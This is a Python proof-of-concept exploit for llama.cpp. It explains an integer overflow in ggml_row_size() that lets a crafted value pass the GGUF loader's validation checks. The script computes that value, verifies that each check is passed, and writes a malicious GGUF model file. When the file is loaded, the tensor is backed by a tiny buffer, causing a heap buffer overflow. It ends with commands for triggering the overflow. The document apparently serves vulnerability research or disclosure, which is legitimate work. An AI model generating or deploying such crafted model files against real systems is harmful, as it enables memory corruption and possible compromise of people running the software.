#!/usr/bin/env python3
"""
PoC: Heap Buffer Overflow via Integer Overflow in Tensor Size Calculation
Target: llama.cpp GGUF loading (ggml/src/ggml.c and ggml/src/gguf.cpp)
=== Vulnerability Summary ===
In ggml_row_size() (ggml.c:1275):

    size_t ggml_row_size(enum ggml_type type, int64_t ne) {
        return ggml_type_size(type)*ne/ggml_blck_size(type);
    }
The multiplication `ggml_type_size(type) * ne` is performed in size_t (uint64_t)
arithmetic. When type_size * ne >= 2^64, the product silently wraps modulo 2^64,
producing a much smaller value than the true size. The subsequent division by
blck_size then yields a tiny row size.
This propagates to:
- ggml_new_tensor_impl() (ggml.c:1686) where data_size is computed
- ggml_nbytes() (ggml.c:1238) where the tensor byte size is computed
- Buffer allocation and data loading code
The overflow check in gguf.cpp (lines 550-552) verifies that the ELEMENT COUNT
(ne[0]*ne[1]*ne[2]*ne[3]) fits in int64_t, but it does not guard the intermediate
product used to compute the BYTE SIZE. For Q4_0 (type_size = 18), type_size * ne
exceeds 2^64 for values of ne well below INT64_MAX, so the product can wrap even
when the element count is valid.
The byte-size check at gguf.cpp line 589:

    uint64_t(ggml_nelements(&info.t)/ggml_blck_size(info.t.type)) > SIZE_MAX/ggml_type_size(info.t.type)

divides by the block size BEFORE multiplying, so it only proves that
(nelements/blck_size) * type_size fits in size_t -- which it does for our chosen
values. ggml_row_size(), however, multiplies BEFORE dividing: the intermediate
product type_size * ne wraps around 2^64 even though the final byte size would
fit comfortably in size_t.
=== Exploit Strategy ===
For GGML_TYPE_Q4_0:
- type_size = 18 bytes (sizeof(block_q4_0) = sizeof(ggml_half) + 32/2 = 2 + 16)
- blck_size = 32
We choose ne[0] such that 18 * ne[0] wraps around 2^64 to a tiny value.
ne[0] = 1024819115206086208 (divisible by 32)
Mathematical: 18 * ne[0] = 18446744073709551744 = 2^64 + 128
In uint64: 18 * ne[0] mod 2^64 = 128
After /32: 128 / 32 = 4 bytes (ggml_row_size returns 4!)
Correct: 18 * ne[0] / 32 = 576460752303423492 bytes (~512 PB)
Computed: 4 bytes
Ratio: buffer is 144,115,188,075,855,873x too small!
Validation bypass:
- ne[0] = 1024819115206086208 < INT64_MAX (9223372036854775807) -> passes
- ne[0] > 0 -> passes non-negative check
- ne[0] % 32 == 0 -> passes block alignment check
- ggml_nelements = ne[0] = 1024819115206086208
- nelements/32 = 32025597350190194
- SIZE_MAX/18 = 1024819115206086200
- 32025597350190194 < 1024819115206086200 -> passes byte size check (line 589)!
Result: A tensor is created with ne[0] = 1024819115206086208 elements but backed
by only 4-32 bytes of actual buffer. Any operation that accesses data beyond the
first few bytes triggers a heap buffer overflow.
=== GGUF Binary Format Reference ===
Header:
- Magic: "GGUF" (4 bytes)
- Version: uint32 (3)
- n_tensors: uint64
- n_kv: uint64
KV pairs:
- key: string (uint64 len + chars)
- type: uint32 (GGUF type enum)
- value: type-dependent
Tensor info (per tensor):
- name: string (uint64 len + chars)
- n_dims: uint32
- ne[0..n_dims-1]: int64 each
- type: uint32 (ggml_type enum)
- offset: uint64
Data section: aligned to ctx->alignment (default 32)
"""
import os
import struct
# ============================================================
# GGUF constants
# ============================================================
GGUF_MAGIC = b"GGUF"
GGUF_VERSION = 3
# GGUF value types
GGUF_TYPE_UINT8 = 0
GGUF_TYPE_INT8 = 1
GGUF_TYPE_UINT16 = 2
GGUF_TYPE_INT16 = 3
GGUF_TYPE_UINT32 = 4
GGUF_TYPE_INT32 = 5
GGUF_TYPE_FLOAT32 = 6
GGUF_TYPE_BOOL = 7
GGUF_TYPE_STRING = 8
GGUF_TYPE_ARRAY = 9
GGUF_TYPE_UINT64 = 10
GGUF_TYPE_INT64 = 11
GGUF_TYPE_FLOAT64 = 12
# ggml_type enum values
GGML_TYPE_F32 = 0
GGML_TYPE_F16 = 1
GGML_TYPE_Q4_0 = 2
GGML_TYPE_Q4_1 = 3
GGML_TYPE_Q5_0 = 6
GGML_TYPE_Q5_1 = 7
GGML_TYPE_Q8_0 = 8
GGML_TYPE_I8 = 24
GGML_TYPE_I32 = 26
# Q4_0 type properties
Q4_0_TYPE_SIZE = 18 # sizeof(block_q4_0) = sizeof(ggml_half) + QK4_0/2 = 2 + 16
Q4_0_BLCK_SIZE = 32 # QK4_0
INT64_MAX = (1 << 63) - 1
UINT64_MAX = (1 << 64) - 1
SIZE_MAX = UINT64_MAX # 64-bit platform
GGML_DEFAULT_ALIGNMENT = 32
# ============================================================
# Helper functions
# ============================================================
def write_string(f, s):
    """Write a GGUF string: uint64 length + chars (no null terminator)."""
    encoded = s.encode('utf-8')
    f.write(struct.pack('<Q', len(encoded)))
    f.write(encoded)

def write_kv_string(f, key, value):
    """Write a KV pair with a string value."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_STRING))
    write_string(f, value)

def write_kv_uint32(f, key, value):
    """Write a KV pair with a uint32 value."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_UINT32))
    f.write(struct.pack('<I', value))

def write_kv_float32(f, key, value):
    """Write a KV pair with a float32 value."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
    f.write(struct.pack('<f', value))

def write_kv_string_array(f, key, values):
    """Write a KV pair with a string-array value."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
    f.write(struct.pack('<I', GGUF_TYPE_STRING))
    f.write(struct.pack('<Q', len(values)))
    for v in values:
        write_string(f, v)

def write_kv_float32_array(f, key, values):
    """Write a KV pair with a float32-array value."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
    f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
    f.write(struct.pack('<Q', len(values)))
    for v in values:
        f.write(struct.pack('<f', v))

def write_tensor_info(f, name, n_dims, ne_list, ggml_type, offset):
    """Write a single tensor-info entry."""
    write_string(f, name)
    f.write(struct.pack('<I', n_dims))
    for i in range(n_dims):
        f.write(struct.pack('<q', ne_list[i]))  # int64_t (signed)
    f.write(struct.pack('<I', ggml_type))
    f.write(struct.pack('<Q', offset))
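As a sanity check on the writer above, the tensor-info layout can be read back with struct.unpack. The snippet below is an illustrative round-trip only; `read_tensor_info` is our own helper, not part of the PoC, and the raw bytes are built inline so the example is self-contained:

```python
import io
import struct

def read_tensor_info(f):
    """Parse one tensor-info entry (inverse of the layout written above)."""
    (name_len,) = struct.unpack('<Q', f.read(8))
    name = f.read(name_len).decode('utf-8')
    (n_dims,) = struct.unpack('<I', f.read(4))
    ne = [struct.unpack('<q', f.read(8))[0] for _ in range(n_dims)]
    (ggml_type,) = struct.unpack('<I', f.read(4))
    (offset,) = struct.unpack('<Q', f.read(8))
    return name, ne, ggml_type, offset

# The same bytes write_tensor_info would emit for the PoC tensor.
name = b"token_embd.weight"
raw = struct.pack('<Q', len(name)) + name       # string: uint64 len + chars
raw += struct.pack('<I', 1)                     # n_dims
raw += struct.pack('<q', 1024819115206086208)   # ne[0]
raw += struct.pack('<I', 2)                     # GGML_TYPE_Q4_0
raw += struct.pack('<Q', 0)                     # offset
print(read_tensor_info(io.BytesIO(raw)))
```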
# ============================================================
# Overflow calculation and verification
# ============================================================
def compute_overflow_ne0():
    """
    Find ne[0] for the Q4_0 type such that:
    - ne[0] is positive and fits in int64_t (< 2^63)
    - ne[0] is divisible by blck_size (32)
    - 18 * ne[0] overflows uint64_t to a very small value
    - all GGUF validation checks pass
    We solve: 18 * ne[0] = k * 2^64 + remainder
    For k=1: ne[0] = (2^64 + remainder) / 18
    We want the remainder to be small and divisible by 32 (so that
    ggml_row_size = remainder/32 is small).
    18 * ne[0] = 2^64 + 128 (remainder=128, 128/32=4)
    ne[0] = (2^64 + 128) / 18 = 1024819115206086208
    """
    type_size = Q4_0_TYPE_SIZE  # 18
    blck_size = Q4_0_BLCK_SIZE  # 32
    # We want: type_size * ne0 = 2^64 + target_remainder.
    # Choose target_remainder = 128 (divisible by 32, gives a row_size of 4).
    target_remainder = 128
    target_product = (1 << 64) + target_remainder
    if target_product % type_size != 0:
        raise ValueError(f"Cannot find exact ne[0]: {target_product} not divisible by {type_size}")
    ne0 = target_product // type_size
    assert ne0 * type_size == target_product, "Arithmetic check failed"
    # Verify ne0 is divisible by blck_size
    assert ne0 % blck_size == 0, f"ne[0]={ne0} not divisible by blck_size={blck_size}"
    # Verify ne0 fits in int64_t
    assert 0 < ne0 < (1 << 63), f"ne[0]={ne0} does not fit in int64_t"
    return ne0
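The closed-form choice above (k=1, remainder=128) can also be found by a small search over candidate remainders, which generalizes to other quantized types. The helper below is illustrative only (`find_overflow_ne0` is our own name, not from llama.cpp):

```python
def find_overflow_ne0(type_size, blck_size):
    # Search the smallest remainder r (a multiple of blck_size) such that
    # 2^64 + r is divisible by type_size and the resulting ne0 passes the
    # int64_t and block-alignment checks.
    # Returns (ne0, row_size_after_wrap) or None if no candidate is found.
    for r in range(0, 64 * blck_size, blck_size):
        product = (1 << 64) + r
        if product % type_size:
            continue
        ne0 = product // type_size
        if 0 < ne0 < (1 << 63) and ne0 % blck_size == 0:
            return ne0, r // blck_size
    return None

print(find_overflow_ne0(18, 32))  # Q4_0 -> (1024819115206086208, 4)
```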
def verify_overflow(ne0, ne1=1, ne2=1, ne3=1):
    """Verify that the chosen dimensions bypass all checks and cause overflow."""
    type_size = Q4_0_TYPE_SIZE
    blck_size = Q4_0_BLCK_SIZE
    print(f"\n{'='*70}")
    print("OVERFLOW ANALYSIS")
    print(f"{'='*70}")
    print(f"Type: Q4_0 (type_size={type_size}, blck_size={blck_size})")
    print(f"Dimensions: ne[0]={ne0}, ne[1]={ne1}, ne[2]={ne2}, ne[3]={ne3}")
    print()
    # Check 1: gguf.cpp lines 540-546 - non-negative check
    assert ne0 >= 0 and ne1 >= 0 and ne2 >= 0 and ne3 >= 0
    print("[PASS] All ne[j] >= 0 (non-negative check)")
    # Check 2: gguf.cpp lines 550-552 - element-count overflow check
    # INT64_MAX/ne[1] <= ne[0] -> must be FALSE to pass
    check2a = INT64_MAX // ne1 <= ne0
    print(f"  Check 2a: INT64_MAX/ne[1] = {INT64_MAX // ne1} <= ne[0] = {ne0} ? {check2a}")
    assert not check2a, "Failed overflow check 2a!"
    # INT64_MAX/ne[2] <= ne[0]*ne[1] -> must be FALSE
    prod01 = ne0 * ne1  # safe in Python (arbitrary precision)
    assert prod01 < (1 << 63), f"ne[0]*ne[1] = {prod01} overflows int64_t!"
    check2b = INT64_MAX // ne2 <= prod01
    print(f"  Check 2b: INT64_MAX/ne[2] = {INT64_MAX // ne2} <= ne[0]*ne[1] = {prod01} ? {check2b}")
    assert not check2b, "Failed overflow check 2b!"
    # INT64_MAX/ne[3] <= ne[0]*ne[1]*ne[2] -> must be FALSE
    prod012 = prod01 * ne2
    assert prod012 < (1 << 63), f"ne[0]*ne[1]*ne[2] = {prod012} overflows int64_t!"
    check2c = INT64_MAX // ne3 <= prod012
    print(f"  Check 2c: INT64_MAX/ne[3] = {INT64_MAX // ne3} <= ne[0]*ne[1]*ne[2] = {prod012} ? {check2c}")
    assert not check2c, "Failed overflow check 2c!"
    print("[PASS] Overflow check at gguf.cpp:550-552 bypassed")
    # Check 3: gguf.cpp line 580 - block alignment
    assert ne0 % blck_size == 0
    print("[PASS] ne[0] % blck_size == 0 (block alignment check)")
    # Check 4: gguf.cpp line 589 - byte size representable
    nelements = ne0 * ne1 * ne2 * ne3
    assert nelements < (1 << 63), "ggml_nelements overflows int64_t!"
    lhs = nelements // blck_size  # uint64_t(ggml_nelements/blck_size)
    rhs = SIZE_MAX // type_size   # SIZE_MAX/type_size
    byte_check = lhs > rhs
    print(f"  Byte size check: nelements/blck_size = {lhs} > SIZE_MAX/type_size = {rhs} ? {byte_check}")
    assert not byte_check, "Failed byte size check!"
    print("[PASS] Byte size check at gguf.cpp:589 bypassed")
    # Now compute the ACTUAL overflow
    print(f"\n{'='*70}")
    print("SIZE COMPUTATION (showing the overflow)")
    print(f"{'='*70}")
    # ggml_row_size(Q4_0, ne[0]) = type_size * ne[0] / blck_size
    true_product = type_size * ne0
    wrapped_product = true_product % (1 << 64)  # uint64_t wrap
    row_size_overflowed = wrapped_product // blck_size
    row_size_correct = true_product // blck_size
    print("\nggml_row_size computation:")
    print(f"  type_size * ne[0] = {true_product}")
    print(f"                    = 2^64 * {true_product // (1 << 64)} + {true_product % (1 << 64)}")
    print(f"  In uint64_t (mod 2^64): {wrapped_product}")
    print(f"  After / blck_size: {row_size_overflowed} bytes <-- OVERFLOWED!")
    print(f"  Correct value:     {row_size_correct} bytes")
    print(f"  Overflow factor: {row_size_correct / row_size_overflowed:.0f}x too small!")
    # data_size computation
    data_size = row_size_overflowed
    for dim in [ne1, ne2, ne3]:
        if dim > 1:
            data_size = (data_size * dim) % (1 << 64)
    correct_size = row_size_correct * ne1 * ne2 * ne3
    print("\ndata_size (ggml_new_tensor_impl):")
    print(f"  Computed: {data_size} bytes")
    print(f"  Correct:  {correct_size} bytes ({correct_size / (1024**5):.1f} PB)")
    # ggml_nbytes computation
    # For quantized types: nbytes = ne[0]*nb[0]/blck_size + sum((ne[i]-1)*nb[i])
    nb0 = type_size                       # = 18
    nb1 = type_size * (ne0 // blck_size)  # does not overflow: ne0/32 is moderate
    nb2 = nb1 * ne1
    nb3 = nb2 * ne2
    # ne[0] * nb[0] overflows!
    ne0_nb0_true = ne0 * nb0
    ne0_nb0_wrapped = ne0_nb0_true % (1 << 64)
    nbytes_first = ne0_nb0_wrapped // blck_size
    nbytes = nbytes_first
    if ne1 > 1:
        nbytes += (ne1 - 1) * nb1
    if ne2 > 1:
        nbytes += (ne2 - 1) * nb2
    if ne3 > 1:
        nbytes += (ne3 - 1) * nb3
    nbytes_correct = correct_size
    print("\nggml_nbytes:")
    print(f"  ne[0]*nb[0] = {ne0} * {nb0} = {ne0_nb0_true}")
    print(f"  In uint64_t: {ne0_nb0_wrapped}")
    print(f"  / blck_size: {nbytes_first}")
    print(f"  + stride terms: {nbytes - nbytes_first}")
    print(f"  Total nbytes:  {nbytes} bytes")
    print(f"  Correct value: {nbytes_correct} bytes")
    # What gets allocated vs what the tensor "thinks" it has
    padded = ((nbytes + GGML_DEFAULT_ALIGNMENT - 1) // GGML_DEFAULT_ALIGNMENT) * GGML_DEFAULT_ALIGNMENT
    print(f"\n{'='*70}")
    print("HEAP BUFFER OVERFLOW")
    print(f"{'='*70}")
    print(f"  Buffer allocated:    {padded} bytes (GGML_PAD({nbytes}, {GGML_DEFAULT_ALIGNMENT}))")
    print(f"  Tensor logical size: {nbytes_correct} bytes")
    print(f"  Overflow:            {nbytes_correct - padded} bytes beyond allocation")
    print(f"  Stride nb[1]: {nb1} bytes (distance between rows)")
    print(f"  Any access to row 1+ is {nb1 - padded} bytes out of bounds!")
    return data_size, nbytes, padded
def create_poc_gguf(output_path):
    """
    Create a GGUF file with a tensor whose dimensions cause integer overflow
    in ggml_row_size(), resulting in a tiny buffer allocation for what should
    be an enormous tensor.
    """
    ne0 = compute_overflow_ne0()
    ne1 = 1  # keep it simple - a 1D tensor is enough to trigger the overflow
    ne2 = 1
    ne3 = 1
    data_size, nbytes, padded_size = verify_overflow(ne0, ne1, ne2, ne3)
    # ---- Build the GGUF file ----
    # One tensor with overflow-inducing dimensions; use a name that
    # llama.cpp expects for a llama model.
    tensor_name = "token_embd.weight"
    n_tensors = 1
    print(f"\n{'='*70}")
    print("GENERATING GGUF FILE")
    print(f"{'='*70}")
    print(f"  Tensor: '{tensor_name}'")
    print("  Type: Q4_0 (type_size=18, blck_size=32)")
    print(f"  Dimensions: ne[0]={ne0}")
    print(f"  Tensor data in file: {padded_size} bytes (the overflowed/small size)")
    print(f"  Output: {output_path}")
    with open(output_path, 'wb') as f:
        # ---- GGUF header ----
        f.write(GGUF_MAGIC)
        f.write(struct.pack('<I', GGUF_VERSION))
        f.write(struct.pack('<Q', n_tensors))
        # Minimal token vocabulary (just 4 tokens: UNK, BOS, EOS, and a word)
        vocab_tokens = ["<unk>", "<s>", "</s>", "hello"]
        vocab_scores = [0.0, 0.0, 0.0, -1.0]
        vocab_types = [0, 3, 3, 1]  # llama_token_type: UNDEFINED=0, NORMAL=1, CONTROL=3
        # KV pair count: 13 scalars + 3 arrays = 16
        n_kv = 16
        f.write(struct.pack('<Q', n_kv))
        # ---- Scalar KV pairs ----
        write_kv_string(f, "general.architecture", "llama")
        write_kv_string(f, "general.name", "overflow-poc")
        write_kv_uint32(f, "llama.context_length", 2048)
        write_kv_uint32(f, "llama.embedding_length", 4096)
        write_kv_uint32(f, "llama.block_count", 1)
        write_kv_uint32(f, "llama.feed_forward_length", 11008)
        write_kv_uint32(f, "llama.attention.head_count", 32)
        write_kv_uint32(f, "llama.attention.head_count_kv", 32)
        write_kv_float32(f, "llama.rope.freq_base", 10000.0)
        write_kv_float32(f, "llama.attention.layer_norm_rms_epsilon", 1e-5)
        write_kv_string(f, "tokenizer.ggml.model", "llama")
        write_kv_uint32(f, "tokenizer.ggml.bos_token_id", 1)
        write_kv_uint32(f, "tokenizer.ggml.eos_token_id", 2)
        # ---- Array KV pairs (tokenizer vocab) ----
        write_kv_string_array(f, "tokenizer.ggml.tokens", vocab_tokens)
        write_kv_float32_array(f, "tokenizer.ggml.scores", vocab_scores)
        # token types: int32 array
        write_string(f, "tokenizer.ggml.token_type")
        f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
        f.write(struct.pack('<I', GGUF_TYPE_INT32))
        f.write(struct.pack('<Q', len(vocab_types)))
        for t in vocab_types:
            f.write(struct.pack('<i', t))
        # ---- Tensor info ----
        # 1D Q4_0 tensor with overflow-inducing ne[0]
        write_tensor_info(f, tensor_name, 1, [ne0], GGML_TYPE_Q4_0, 0)
        # ---- Align to the data section ----
        current_pos = f.tell()
        aligned_pos = ((current_pos + GGML_DEFAULT_ALIGNMENT - 1) // GGML_DEFAULT_ALIGNMENT) * GGML_DEFAULT_ALIGNMENT
        padding_needed = aligned_pos - current_pos
        if padding_needed > 0:
            f.write(b'\x00' * padding_needed)
        # ---- Tensor data ----
        # Write exactly padded_size bytes (the overflowed, tiny amount).
        # A recognizable fill pattern helps identify OOB reads in a debugger.
        f.write(b'\xAA' * padded_size)
    file_size = os.path.getsize(output_path)
    print(f"  File size: {file_size} bytes")
    print("\n[+] GGUF file written successfully")
    return output_path
def main():
    # Write the PoC file next to this script (portable; no hardcoded home path)
    output_dir = os.path.dirname(os.path.abspath(__file__))
    output_path = os.path.join(output_dir, "poc_tensor_overflow.gguf")
    print("=" * 70)
    print("PoC: Integer Overflow in Tensor Size Calculation (GGUF)")
    print("Target: llama.cpp ggml_row_size() / ggml_nbytes()")
    print("=" * 70)
    # Step 1: compute the overflow-inducing dimension
    ne0 = compute_overflow_ne0()
    print(f"\n[+] Found overflow-inducing ne[0] = {ne0}")
    print(f"    = 0x{ne0:016X}")
    print(f"    Fits in int64_t: {ne0 < (1 << 63)}")
    print(f"    Divisible by 32: {ne0 % 32 == 0}")
    # Steps 2 and 3: verify the validation bypass, then create the GGUF file
    print("\n[+] Verifying validation bypass and computing overflow...")
    create_poc_gguf(output_path)
    # Step 4: instructions
    print(f"\n{'='*70}")
    print("EXPLOITATION")
    print(f"{'='*70}")
    print(f"""
When llama.cpp loads this GGUF file:
1. gguf_init_from_file() reads the tensor info:
   - ne[0] = {ne0}
   - type = Q4_0 (type_size=18, blck_size=32)
   - all validation checks PASS (see analysis above)
2. ggml_nbytes() computes the tensor size:
   - ne[0] * nb[0] = {ne0} * 18 = {ne0 * 18}
   - in uint64_t: {(ne0 * 18) % (1 << 64)} (OVERFLOWED!)
   - result: {((ne0 * 18) % (1 << 64)) // 32} bytes instead of {ne0 * 18 // 32}
3. Buffer allocation uses the tiny overflowed size
   -> only {(((ne0 * 18) % (1 << 64)) // 32 + 31) // 32 * 32} bytes allocated
4. Tensor metadata says ne[0]={ne0} with stride nb[1]={18 * (ne0 // 32)}
   -> any access beyond the first few bytes is a HEAP BUFFER OVERFLOW

To test with llama-cli (demonstrates the GGUF validation bypass):
  ./llama-cli -m {output_path} -p 'hello' 2>&1
  # Note: llama-cli rejects at a model-level shape check, but GGUF parsing passes

To test with the C test harness (demonstrates the actual overflow):
  ./test_tensor_overflow {output_path}
  # Shows: ggml_nbytes=4 for a tensor with ~10^18 elements -> HEAP BUFFER OVERFLOW
""")
if __name__ == "__main__":
    main()